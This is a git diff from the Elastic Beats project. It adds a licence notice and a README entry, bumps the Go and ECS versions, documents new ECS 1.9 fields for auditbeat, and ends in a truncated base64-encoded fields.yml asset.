@@ -40479,6 +40813,43 @@ THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +-------------------------------------------------------------------------------- +Dependency : golang.org/x/term +Version: v0.0.0-20201126162022-7de9c90e9dd1 +Licence type (autodetected): BSD-3-Clause +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/golang.org/x/term@v0.0.0-20201126162022-7de9c90e9dd1/LICENSE: + +Copyright (c) 2009 The Go Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + -------------------------------------------------------------------------------- Dependency : golang.org/x/xerrors Version: v0.0.0-20200804184101-5ec99f83aff1 diff --git a/README.md b/README.md index 7fac58c7d16..2d67eeea591 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ # Beats - The Lightweight Shippers of the Elastic Stack -The [Beats](https://www.elastic.co/products/beats) are lightweight data +The [Beats](https://www.elastic.co/beats) are lightweight data shippers, written in Go, that you install on your servers to capture all sorts of operational data (think of logs, metrics, or network packet data). The Beats send the operational data to Elasticsearch, either directly or via Logstash, so @@ -27,6 +27,7 @@ Beat | Description [Metricbeat](https://github.com/elastic/beats/tree/master/metricbeat) | Fetches sets of metrics from the operating system and services [Packetbeat](https://github.com/elastic/beats/tree/master/packetbeat) | Monitors the network and applications by sniffing packets [Winlogbeat](https://github.com/elastic/beats/tree/master/winlogbeat) | Fetches and ships Windows Event logs +[Osquerybeat](https://github.com/elastic/beats/tree/master/x-pack/osquerybeat) | Runs Osquery and manages interraction with it. In addition to the above Beats, which are officially supported by [Elastic](https://elastic.co), the community has created a set of other Beats 
diff --git a/auditbeat/Dockerfile b/auditbeat/Dockerfile index 4435e1aa944..54df8f43190 100644 --- a/auditbeat/Dockerfile +++ b/auditbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/auditbeat/cmd/root.go b/auditbeat/cmd/root.go index 0766f05b05c..6328ea0bb3d 100644 --- a/auditbeat/cmd/root.go +++ b/auditbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "auditbeat" // ecsVersion specifies the version of ECS that Auditbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd for running auditbeat. diff --git a/auditbeat/docs/fields.asciidoc b/auditbeat/docs/fields.asciidoc index c5b814b54f9..c7b8129b4ae 100644 --- a/auditbeat/docs/fields.asciidoc +++ b/auditbeat/docs/fields.asciidoc @@ -2477,6 +2477,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -3087,6 +3096,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -3144,6 +3164,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -3166,6 +3198,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- 
@@ -3179,9 +3222,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -3496,6 +3542,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -3513,6 +3571,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -3536,6 +3606,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -3702,6 +3784,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -3759,6 +3852,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- 
@@ -3781,6 +3886,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -3794,9 +3910,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -4015,6 +4134,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -4038,6 +4169,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -4098,6 +4241,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -4843,6 +4995,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- 
@@ -4866,6 +5030,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -5014,6 +5190,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -5504,6 +5689,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -5561,6 +5757,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -5583,6 +5791,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -5620,8 +5839,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -5660,6 +5880,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host 
@@ -5678,6 +5907,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -5701,6 +5959,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -5758,6 +6027,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -5780,6 +6061,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -5813,10 +6105,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: 
@@ -5829,6 +6124,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -6106,6 +6437,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -6639,7 +6982,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -6703,7 +7046,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6722,6 +7065,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -6779,6 +7133,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -6801,6 +7167,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -6813,7 +7190,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -6877,7 +7254,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -6897,10 +7274,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -7470,6 +7850,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -7493,6 +7885,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -7615,6 +8019,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- 
@@ -7669,6 +8082,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -7692,6 +8117,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -7814,6 +8251,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -8552,6 +8998,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -8609,6 +9066,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -8631,6 +9100,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- 
@@ -8644,9 +9124,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -9014,6 +9497,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -9071,6 +9565,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -9093,6 +9599,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -9106,9 +9623,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/auditbeat/include/fields.go b/auditbeat/include/fields.go index ebc0d6d76d1..85ca68afe0e 100644 --- a/auditbeat/include/fields.go +++ b/auditbeat/include/fields.go 
@@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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
